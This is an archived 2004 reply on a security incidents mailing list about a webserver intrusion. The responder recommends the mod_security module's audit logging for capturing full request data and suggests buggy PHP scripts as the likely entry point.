Security Incidents mailing list archives
RE: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7)
From: "Bojan Zdrnja" <Bojan.Zdrnja () LSS hr>
Date: Sat, 10 Jul 2004 22:42:51 +1200
Nathan,
-----Original Message----- From: nathan c. dickerson [mailto:nathan () pro net] Sent: Saturday, 10 July 2004 6:16 a.m. To: incidents () securityfocus com Subject: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Greetings, If I could get the full GET and POST request data, I could perform searches for interesting execution strings. Does anyone have any suggestions on this?
Whole thing sounds pretty interesting. Regarding post GET and POST requests, there's (obviously) no way to get them. But, in order to get those logs in the future, you can install mod_security module for Apache (http://www.modsecurity.org). Besides all the nice features that mod_security offers, one pretty interesting is audit logging - it will log full details of every request (including POST requests), which will allow you later analysis. If you have that many sites hosted on a machine (120?), my wild guess would be that they're getting in through one of the buggy PHP scripts - I saw far too many sites compromised because of bad PHP scripts. In any case, it would be interesting to see more information about this. Hope this helps. Cheers, Bojan Zdrnja CISSP
Current thread:
- Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 09)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Dmitry Alyabyev (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 13)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Dmitry Alyabyev (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Frank Knobbe (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 13)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Frank Knobbe (Jul 14)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) nathan c. dickerson (Jul 13)
- RE: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Bojan Zdrnja (Jul 12)
- Re: Interesting webserver intrusion (apache 1.3.31, mod_ssl 2.8.18, php 4.3.7) Tim Greer (Jul 12)